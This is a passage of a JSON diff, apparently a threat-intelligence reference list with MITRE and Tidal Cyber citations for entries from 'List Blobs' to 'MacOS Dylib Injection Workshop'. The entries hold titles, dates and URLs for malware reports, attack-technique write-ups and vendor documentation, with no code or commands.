"uuid": "5ac2d917-756f-48d0-ab32-648b45a29083", + "value": "Uninformed Needle" + }, + { + "description": "Microsoft - List Blobs. (n.d.). Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs" + ], + "source": "MITRE", + "title": "List Blobs" + }, + "related": [], + "uuid": "f9aa697a-83dd-4bae-bc11-006be51ce477", + "value": "List Blobs" + }, + { + "description": "Amazon - ListObjectsV2. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjectsV2.html" + ], + "source": "MITRE", + "title": "ListObjectsV2" + }, + "related": [], + "uuid": "727c2077-f922-4314-908a-356c42564181", + "value": "ListObjectsV2" + }, + { + "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.", + "meta": { + "date_accessed": "2016-04-22T00:00:00Z", + "date_published": "2016-03-31T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/List_of_file_signatures" + ], + "source": "MITRE", + "title": "List of file signatures" + }, + "related": [], + "uuid": "00de69c8-78b1-4de3-a4dc-f5be3dbca212", + "value": "Wikipedia File Header Signatures" + }, + { + "description": "Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved December 4, 2014.", + "meta": { + "date_accessed": "2014-12-04T00:00:00Z", + "refs": [ + "http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29" + ], + "source": "MITRE", + "title": "List of network protocols (OSI model)" + }, + "related": [], + "uuid": "d1080030-12c7-4223-92ab-fb764acf111d", + "value": "Wikipedia OSI" + }, + { + "description": "Amazon. (n.d.). List Roles. Retrieved August 11, 2020.", + "meta": { + "date_accessed": "2020-08-11T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html" + ], + "source": "MITRE", + "title": "List Roles" + }, + "related": [], + "uuid": "42ff02f9-45d0-466b-a5fa-e19c8187b529", + "value": "AWS List Roles" + }, + { + "description": "Google Cloud. (n.d.). List secrets and view secret details. Retrieved September 25, 2023.", + "meta": { + "date_accessed": "2023-09-25T00:00:00Z", + "refs": [ + "https://cloud.google.com/secret-manager/docs/view-secret-details" + ], + "source": "MITRE", + "title": "List secrets and view secret details" + }, + "related": [], + "uuid": "4a9e631d-3588-5585-b00a-316a934e6009", + "value": "Google Cloud Secrets" + }, + { + "description": "Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.", + "meta": { + "date_accessed": "2022-03-11T00:00:00Z", + "date_published": "2018-03-01T00:00:00Z", + "refs": [ + "https://linuxhint.com/list-usb-devices-linux/" + ], + "source": "MITRE", + "title": "List USB Devices Linux" + }, + "related": [], + "uuid": "427b3a1b-88ea-4027-bae6-7fb45490b81d", + "value": "Peripheral Discovery Linux" + }, + { + "description": "Amazon. (n.d.). List Users. Retrieved August 11, 2020.", + "meta": { + "date_accessed": "2020-08-11T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html" + ], + "source": "MITRE", + "title": "List Users" + }, + "related": [], + "uuid": "517e3d27-36da-4810-b256-3f47147b36e3", + "value": "AWS List Users" + }, + { + "description": "jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.", + "meta": { + "date_accessed": "2020-08-21T00:00:00Z", + "date_published": "2020-06-27T00:00:00Z", + "refs": [ + "https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit" + ], + "source": "MITRE", + "title": "Live Discover - PowerShell command audit" + }, + "related": [], + "uuid": "441f289c-7fdc-4cf1-9379-960be75c7202", + "value": "Sophos PowerShell command audit" + }, + { + "description": "Dell SecureWorks Counter Threat Unit Special Operations Team. (2015, May 28). Living off the Land. Retrieved January 26, 2016.", + "meta": { + "date_accessed": "2016-01-26T00:00:00Z", + "date_published": "2015-05-28T00:00:00Z", + "refs": [ + "http://www.secureworks.com/resources/blog/living-off-the-land/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Living off the Land" + }, + "related": [], + "uuid": "79fc7568-b6ff-460b-9200-56d7909ed157", + "value": "Dell TG-1314" + }, + { + "description": "Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018.", + "meta": { + "date_accessed": "2018-04-10T00:00:00Z", + "date_published": "2017-07-01T00:00:00Z", + "refs": [ + "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf" + ], + "source": "MITRE", + "title": "Living off the land and fileless attack techniques" + }, + "related": [], + "uuid": "4bad4659-f501-4eb6-b3ca-0359e3ba824e", + "value": "Symantec Living off the Land" + }, + { + "description": "LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.", + "meta": { + "date_accessed": "2020-02-10T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/" + ], + "source": "MITRE", + "title": "Living Off The Land Binaries and Scripts (and also Libraries)" + }, + "related": [], + "uuid": "615f6fa5-3059-49fc-9fa4-5ca0aeff4331", + "value": "LOLBAS Main Site" + }, + { + "description": "Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.", + "meta": { + "date_accessed": "2022-03-07T00:00:00Z", + "date_published": "2022-02-01T00:00:00Z", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS#criteria" + ], + "source": "MITRE", + "title": "Living Off The Land Binaries, Scripts and Libraries" + }, + "related": [], + "uuid": "14b1d3ab-8508-4946-9913-17e667956064", + "value": "LOLBAS Project" + }, + { + "description": "Jake Nicastro, Willi Ballenthin. (2019, October 9). Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil. Retrieved August 16, 2021.", + "meta": { + "date_accessed": "2021-08-16T00:00:00Z", + "date_published": "2019-10-09T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html" + ], + "source": "MITRE", + "title": "Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil" + }, + "related": [], + "uuid": "bbc72952-988e-4c3c-ab5e-75b64e9e33f5", + "value": "FireEye 2019 Apple Remote Desktop" + }, + { + "description": "Pingios, A.. (2018, February 7). LKM loading kernel restrictions. Retrieved June 4, 2020.", + "meta": { + "date_accessed": "2020-06-04T00:00:00Z", + "date_published": "2018-02-07T00:00:00Z", + "refs": [ + "https://xorl.wordpress.com/2018/02/17/lkm-loading-kernel-restrictions/" + ], + "source": "MITRE", + "title": "LKM loading kernel restrictions" + }, + "related": [], + "uuid": "10ccae99-c6f5-4b83-89c9-06a9e35280fc", + "value": "LKM loading kernel restrictions" + }, + { + "description": "Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.", + "meta": { + "date_accessed": "2017-11-17T00:00:00Z", + "refs": [ + "https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response" + ], + "source": "MITRE", + "title": "LLMNR Spoofer" + }, + "related": [], + "uuid": "229b04b6-98ca-4e6f-9917-a26cfe0a7f0d", + "value": "Rapid7 LLMNR Spoofer" + }, + { + "description": "Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2018-03-17T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux" + ], + "source": "MITRE", + "title": "Loadable kernel module" + }, + "related": [], + "uuid": "e6d9f967-4f45-44d2-8a19-69741745f917", + "value": "Wikipedia Loadable Kernel Module" + }, + { + "description": "Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2018-12-05T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya" + ], + "source": "MITRE", + "title": "LoadLibraryA function (libloaderapi.h)" + }, + "related": [], + "uuid": "dfaf5bfa-61a7-45f8-a50e-0d8bc6cb2189", + "value": "Microsoft LoadLibrary" + }, + { + "description": "Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019.", + "meta": { + "date_accessed": "2019-02-11T00:00:00Z", + "date_published": "2018-12-09T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts" + ], + "source": "MITRE", + "title": "Local Accounts" + }, + "related": [], + "uuid": "6ae7487c-cb61-4f10-825f-4ef9ef050b7c", + "value": "Microsoft Local Accounts Feb 2019" + }, + { + "description": "Sternstein, J. (2013, November). Local Network Attacks: LLMNR and NBT-NS Poisoning. Retrieved November 17, 2017.", + "meta": { + "date_accessed": "2017-11-17T00:00:00Z", + "date_published": "2013-11-01T00:00:00Z", + "refs": [ + "https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning" + ], + "source": "MITRE", + "title": "Local Network Attacks: LLMNR and NBT-NS Poisoning" + }, + "related": [], + "uuid": "422a6043-78c2-43ef-8e87-7d7a8878f94a", + "value": "Sternsecurity LLMNR-NBTNS" + }, + { + "description": "Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals target you based on where you live. Retrieved April 1, 2021.", + "meta": { + "date_accessed": "2021-04-01T00:00:00Z", + "date_published": "2016-05-03T00:00:00Z", + "refs": [ + "https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/" + ], + "source": "MITRE", + "title": "Location-based threats: How cybercriminals target you based on where you live" + }, + "related": [], + "uuid": "a3b7540d-20cc-4d94-8321-9fd730486f8c", + "value": "Sophos Geolocation 2016" + }, + { + "description": "Dana Behling. (2022, October 15). LockBit 3.0 Ransomware Unlocked. Retrieved May 19, 2023.", + "meta": { + "date_accessed": "2023-05-19T00:00:00Z", + "date_published": "2022-10-15T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html" + ], + "source": "Tidal Cyber", + "title": "LockBit 3.0 Ransomware Unlocked" + }, + "related": [], + "uuid": "b625f291-0152-468c-a130-ec8fb0c6ad21", + "value": "VMWare LockBit 3.0 October 2022" + }, + { + "description": "Jim Walter, Aleksandar Milenkoski. (2022, July 21). LockBit 3.0 Update | Unpicking the Ransomware’s Latest Anti-Analysis and Evasion Techniques. Retrieved May 19, 2023.", + "meta": { + "date_accessed": "2023-05-19T00:00:00Z", + "date_published": "2022-07-21T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/" + ], + "source": "Tidal Cyber", + "title": "LockBit 3.0 Update | Unpicking the Ransomware’s Latest Anti-Analysis and Evasion Techniques" + }, + "related": [], + "uuid": "9a73b140-b483-4274-a134-ed1bb15ac31c", + "value": "Sentinel Labs LockBit 3.0 July 2022" + }, + { + "description": "Cary, M. (2018, December 6). Locked File Access Using ESENTUTL.exe. Retrieved September 5, 2019.", + "meta": { + "date_accessed": "2019-09-05T00:00:00Z", + "date_published": "2018-12-06T00:00:00Z", + "refs": [ + "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/" + ], + "source": "MITRE", + "title": "Locked File Access Using ESENTUTL.exe" + }, + "related": [], + "uuid": "aa1211c6-e490-444a-8aab-7626e0700dd0", + "value": "Cary Esentutl" + }, + { + "description": "Group IB. (2020, September). LOCK LIKE A PRO. Retrieved September 27, 2021.", + "meta": { + "date_accessed": "2021-09-27T00:00:00Z", + "date_published": "2020-09-01T00:00:00Z", + "refs": [ + "https://groupib.pathfactory.com/ransomware-reports/prolock_wp" + ], + "source": "MITRE", + "title": "LOCK LIKE A PRO" + }, + "related": [], + "uuid": "52d0e16f-9a20-442f-9a17-686e51d7e32b", + "value": "Group IB Ransomware September 2020" + }, + { + "description": "Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail. Retrieved April 27, 2020.", + "meta": { + "date_accessed": "2020-04-27T00:00:00Z", + "date_published": "2020-01-01T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html" + ], + "source": "MITRE", + "title": "Logging AWS Backup API Calls with AWS CloudTrail" + }, + "related": [], + "uuid": "17222170-5454-4a7d-804b-23753ec841eb", + "value": "AWS Cloud Trail Backup API" + }, + { + "description": "AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html" + ], + "source": "MITRE", + "title": "Logging IAM and AWS STS API calls with AWS CloudTrail" + }, + "related": [], + "uuid": "2aa0682b-f553-4c2b-ae9e-112310bcb8d0", + "value": "AWS Logging IAM Calls" + }, + { + "description": "Apple. (n.d.). Login Items AE. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/samplecode/LoginItemsAE/Introduction/Intro.html#//apple_ref/doc/uid/DTS10003788" + ], + "source": "MITRE", + "title": "Login Items AE" + }, + "related": [], + "uuid": "d15943dd-d11c-4af2-a3ac-9ebe168a7526", + "value": "Login Items AE" + }, + { + "description": "Apple. (n.d.). LoginWindowScripts. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "refs": [ + "https://developer.apple.com/documentation/devicemanagement/loginwindowscripts" + ], + "source": "MITRE", + "title": "LoginWindowScripts" + }, + "related": [], + "uuid": "340eb8df-cc22-4b59-8dca-32ec52fd6818", + "value": "LoginWindowScripts Apple Dev" + }, + { + "description": "LogMeIn. (n.d.). LogMeIn Homepage. Retrieved November 16, 2023.", + "meta": { + "date_accessed": "2023-11-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.logmein.com/" + ], + "source": "Tidal Cyber", + "title": "LogMeIn Homepage" + }, + "related": [], + "uuid": "e113b544-82ad-4099-ab4e-7fc8b78f54bd", + "value": "LogMeIn Homepage" + }, + { + "description": "ESET. (2018, September). LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group. Retrieved July 2, 2019.", + "meta": { + "date_accessed": "2019-07-02T00:00:00Z", + "date_published": "2018-09-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" + ], + "source": "MITRE", + "title": "LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group" + }, + "related": [], + "uuid": "bb938fea-2b2e-41d3-a55c-40ea34c00d21", + "value": "ESET LoJax Sept 2018" + }, + { + "description": "Cheruku, H. (2020, April 15). LOKIBOT WITH AUTOIT OBFUSCATOR + FRENCHY SHELLCODE. Retrieved May 14, 2020.", + "meta": { + "date_accessed": "2020-05-14T00:00:00Z", + "date_published": "2020-04-15T00:00:00Z", + "refs": [ + "https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode" + ], + "source": "MITRE", + "title": "LOKIBOT WITH AUTOIT OBFUSCATOR + FRENCHY SHELLCODE" + }, + "related": [], + "uuid": "e938bab1-7dc1-4a78-b1e2-ab2aa0a83eb0", + "value": "Morphisec Lokibot April 2020" + }, + { + "description": "LOLBAS. (n.d.). LOLBAS Mapped to T1105. Retrieved March 11, 2022.", + "meta": { + "date_accessed": "2022-03-11T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/#t1105" + ], + "source": "MITRE", + "title": "LOLBAS Mapped to T1105" + }, + "related": [], + "uuid": "80e649f5-6c74-4d66-a452-4f4cd51501da", + "value": "t1105_lolbas" + }, + { + "description": "Pradhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022.", + "meta": { + "date_accessed": "2022-03-22T00:00:00Z", + "date_published": "2022-02-08T00:00:00Z", + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns" + ], + "source": "MITRE", + "title": "LolZarus: Lazarus Group Incorporating Lolbins into Campaigns" + }, + "related": [], + "uuid": "784f1f5a-f7f2-45e8-84bd-b600f2b74b33", + "value": "Qualys LolZarus" + }, + { + "description": "Liviu Arsene, Radu Tudorica. (2020, November 23). TrickBot is Dead. Long Live TrickBot!. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "refs": [ + "https://www.bitdefender.com/blog/labs/trickbot-is-dead-long-live-trickbot/" + ], + "source": "MITRE", + "title": "Long Live TrickBot!" + }, + "related": [], + "uuid": "1a281862-efc8-4566-8d06-ba463e22225d", + "value": "Bitdefender Trickbot C2 infra Nov 2020" + }, + { + "description": "Raggi, M. Schwarz, D.. (2019, August 1). LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021.", + "meta": { + "date_accessed": "2021-02-25T00:00:00Z", + "date_published": "2019-08-01T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks" + ], + "source": "MITRE", + "title": "LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards" + }, + "related": [], + "uuid": "77887f82-7815-4a91-8c8a-f77dc8a9ba53", + "value": "Proofpoint LookBack Malware Aug 2019" + }, + { + "description": "Fidelis Cybersecurity. (2015, August 4). Looking at the Sky for a DarkComet. Retrieved April 5, 2016.", + "meta": { + "date_accessed": "2016-04-05T00:00:00Z", + "date_published": "2015-08-04T00:00:00Z", + "refs": [ + "https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf" + ], + "source": "MITRE", + "title": "Looking at the Sky for a DarkComet" + }, + "related": [], + "uuid": "6043b34d-dec3-415b-8329-05f698f320e3", + "value": "Fidelis DarkComet" + }, + { + "description": "Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelgänging. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-12-07T00:00:00Z", + "refs": [ + "https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf" + ], + "source": "MITRE", + "title": "Lost in Transaction: Process Doppelgänging" + }, + "related": [], + "uuid": "b0752c3a-1777-4209-938d-5382de6a49f5", + "value": "BlackHat Process Doppelgänging Dec 2017" + }, + { + "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020.", + "meta": { + "date_accessed": "2020-05-18T00:00:00Z", + "date_published": "2019-06-20T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/" + ], + "source": "MITRE", + "title": "LoudMiner: Cross-platform mining in cracked VST software" + }, + "related": [], + "uuid": "f1e4ff9e-cb6c-46cc-898e-5f170bb5f634", + "value": "ESET LoudMiner June 2019" + }, + { + "description": "Warren, J. (2017, June 22). lsadump::changentlm and lsadump::setntlm work, but generate Windows events #92. Retrieved December 4, 2017.", + "meta": { + "date_accessed": "2017-12-04T00:00:00Z", + "date_published": "2017-06-22T00:00:00Z", + "refs": [ + "https://github.com/gentilkiwi/mimikatz/issues/92" + ], + "source": "MITRE", + "title": "lsadump::changentlm and lsadump::setntlm work, but generate Windows events #92" + }, + "related": [], + "uuid": "099c3492-1813-4874-9901-e24b081f7e12", + "value": "GitHub Mimikatz Issue 92 June 2017" + }, + { + "description": "Kerrisk, M. (2022, December 18). lsmod(8) — Linux manual page. Retrieved March 28, 2023.", + "meta": { + "date_accessed": "2023-03-28T00:00:00Z", + "date_published": "2022-12-18T00:00:00Z", + "refs": [ + "https://man7.org/linux/man-pages/man8/lsmod.8.html" + ], + "source": "MITRE", + "title": "lsmod(8) — Linux manual page" + }, + "related": [], + "uuid": "c2f88274-9da4-5d24-b68d-302ee5990dd5", + "value": "lsmod man" + }, + { + "description": "Hsu, K. et al. (2020, June 24). Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices. Retrieved November 16, 2020.", + "meta": { + "date_accessed": "2020-11-16T00:00:00Z", + "date_published": "2020-06-24T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/" + ], + "source": "MITRE", + "title": "Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices" + }, + "related": [], + "uuid": "3977a87a-2eab-4a67-82b2-10c9dc7e4554", + "value": "Unit 42 Lucifer June 2020" + }, + { + "description": "Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.", + "meta": { + "date_accessed": "2018-08-18T00:00:00Z", + "date_published": "2018-06-13T00:00:00Z", + "refs": [ + "https://securelist.com/luckymouse-hits-national-data-center/86083/" + ], + "source": "MITRE", + "title": "LuckyMouse hits national data center to organize country-level waterholing campaign" + }, + "related": [], + "uuid": "f974708b-598c-46a9-aac9-c5fbdd116c2a", + "value": "Securelist LuckyMouse June 2018" + }, + { + "description": "Ian Ahl. (2023, September 20). LUCR-3: Scattered Spider Getting SaaS-y In The Cloud. Retrieved September 20, 2023.", + "meta": { + "date_accessed": "2023-09-20T00:00:00Z", + "date_published": "2023-09-20T00:00:00Z", + "refs": [ + "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud" + ], + "source": "MITRE", + "title": "LUCR-3: Scattered Spider Getting SaaS-y In The Cloud" + }, + "related": [], + "uuid": "033e7c95-cded-5e51-9a9f-1c6038b0509f", + "value": "lucr-3: Getting SaaS-y in the cloud" + }, + { + "description": "Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.", + "meta": { + "date_accessed": "2023-09-25T00:00:00Z", + "date_published": "2023-09-20T00:00:00Z", + "refs": [ + "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud" + ], + "source": "MITRE", + "title": "LUCR-3: SCATTERED SPIDER GETTING SAAS-Y IN THE CLOUD" + }, + "related": [], + "uuid": "020b97ab-466d-52e6-b1f1-6f9f8ffdabf0", + "value": "Permiso Scattered Spider 2023" + }, + { + "description": "Lechtik, M, and etl. (2021, July 14). LuminousMoth APT: Sweeping attacks for the chosen few. Retrieved October 20, 2022.", + "meta": { + "date_accessed": "2022-10-20T00:00:00Z", + "date_published": "2021-07-14T00:00:00Z", + "refs": [ + "https://securelist.com/apt-luminousmoth/103332/" + ], + "source": "MITRE", + "title": "LuminousMoth APT: Sweeping attacks for the chosen few" + }, + "related": [], + "uuid": "e21c6931-fba8-52b0-b6f0-1c8222881fbd", + "value": "Kaspersky LuminousMoth July 2021" + }, + { + "description": "Botezatu, B and etl. (2021, July 21). LuminousMoth - PlugX, File Exfiltration and Persistence Revisited. Retrieved October 20, 2022.", + "meta": { + "date_accessed": "2022-10-20T00:00:00Z", + "date_published": "2021-07-21T00:00:00Z", + "refs": [ + "https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited" + ], + "source": "MITRE", + "title": "LuminousMoth - PlugX, File Exfiltration and Persistence Revisited" + }, + "related": [], + "uuid": "6b1ce8bb-4e77-59f3-87ff-78f4a1a10ad3", + "value": "Bitdefender LuminousMoth July 2021" + }, + { + "description": "Kristopher Russo. (n.d.). Luna Moth Callback Phishing Campaign. Retrieved February 2, 2023.", + "meta": { + "date_accessed": "2023-02-02T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/" + ], + "source": "MITRE", + "title": "Luna Moth Callback Phishing Campaign" + }, + "related": [], + "uuid": "ec52bcc9-6a56-5b94-8534-23c8e7ce740f", + "value": "Unit42 Luna Moth" + }, + { + "description": "Oren Biderman, Tomer Lahiyani, Noam Lifshitz, Ori Porag. (n.d.). LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS. Retrieved February 2, 2023.", + "meta": { + "date_accessed": "2023-02-02T00:00:00Z", + "refs": [ + "https://blog.sygnia.co/luna-moth-false-subscription-scams" + ], + "source": "MITRE", + "title": "LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS" + }, + "related": [], + "uuid": "3e1c2a64-8446-538d-a148-2de87991955a", + "value": "sygnia Luna Month" + }, + { + "description": "Shivtarkar, N. and Kumar, A. (2022, June 9). Lyceum .NET DNS Backdoor. Retrieved June 23, 2022.", + "meta": { + "date_accessed": "2022-06-23T00:00:00Z", + "date_published": "2022-06-09T00:00:00Z", + "refs": [ + "https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor" + ], + "source": "MITRE", + "title": "Lyceum .NET DNS Backdoor" + }, + "related": [], + "uuid": "eb78de14-8044-4466-8954-9ca44a17e895", + "value": "Zscaler Lyceum DnsSystem June 2022" + }, + { + "description": "Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.", + "meta": { + "date_accessed": "2022-06-14T00:00:00Z", + "date_published": "2021-10-01T00:00:00Z", + "refs": [ + "https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf" + ], + "source": "MITRE", + "title": "LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST" + }, + "related": [], + "uuid": "b3d13a82-c24e-4b47-b47a-7221ad449859", + "value": "Kaspersky Lyceum October 2021" + }, + { + "description": "Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2018-10-29T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/" + ], + "source": "MITRE", + "title": "Mac cryptocurrency ticker app installs backdoors" + }, + "related": [], + "uuid": "99c53143-6f93-44c9-a874-c1b9e4506fb4", + "value": "CoinTicker 2019" + }, + { + "description": "ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.", + "meta": { + "date_accessed": "2019-09-13T00:00:00Z", + "date_published": "2019-07-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "MACHETE JUST GOT SHARPER Venezuelan government institutions under attack" + }, + "related": [], + "uuid": "408d5e33-fcb6-4d21-8be9-7aa5a8bd3385", + "value": "ESET Machete July 2019" + }, + { + "description": "Patrick Wardle. (2017, January 1). Mac Malware of 2016. Retrieved September 21, 2018.", + "meta": { + "date_accessed": "2018-09-21T00:00:00Z", + "date_published": "2017-01-01T00:00:00Z", + "refs": [ + "https://www.synack.com/2017/01/01/mac-malware-2016/" + ], + "source": "MITRE", + "title": "Mac Malware of 2016" + }, + "related": [], + "uuid": "9845ef95-bcc5-4430-8008-1e4a28e13c33", + "value": "synack 2016 review" + }, + { + "description": "Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.", + "meta": { + "date_accessed": "2018-09-21T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x25.html" + ], + "source": "MITRE", + "title": "Mac Malware of 2017" + }, + "related": [], + "uuid": "08227ae5-4086-4c31-83d9-459c3a097754", + "value": "objsee mac malware 2017" + }, + { + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved July 22, 2020.", + "meta": { + "date_accessed": "2020-07-22T00:00:00Z", + "date_published": "2019-01-31T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/" + ], + "source": "MITRE", + "title": "Mac Malware Steals Cryptocurrency Exchanges’ Cookies" + }, + "related": [], + "uuid": "4605c51d-b36e-4c29-abda-2a97829f6019", + "value": "Unit42 CookieMiner Jan 2019" + }, + { + "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.", + "meta": { + "date_accessed": "2019-10-14T00:00:00Z", + "date_published": "2019-01-31T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/" + ], + "source": "MITRE", + "title": "Mac Malware Steals Cryptocurrency Exchanges’ Cookies" + }, + "related": [], + "uuid": "0a88e730-8ed2-4983-8f11-2cb2e4abfe3e", + "value": "Unit 42 Mac Crypto Cookies January 2019" + }, + { + "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.", + "meta": { + "date_accessed": "2020-06-30T00:00:00Z", + "date_published": "2019-04-17T00:00:00Z", + "refs": [ + "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/" + ], + "source": "MITRE", + "title": "macOS Bundlore: Mac Virus Bypassing macOS Security Features" + }, + "related": [], + "uuid": "4d631c9a-4fd5-43a4-8b78-4219bd371e87", + "value": "MacKeeper Bundlore Apr 2019" + }, + { + "description": "Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "date_published": "2020-04-04T00:00:00Z", + 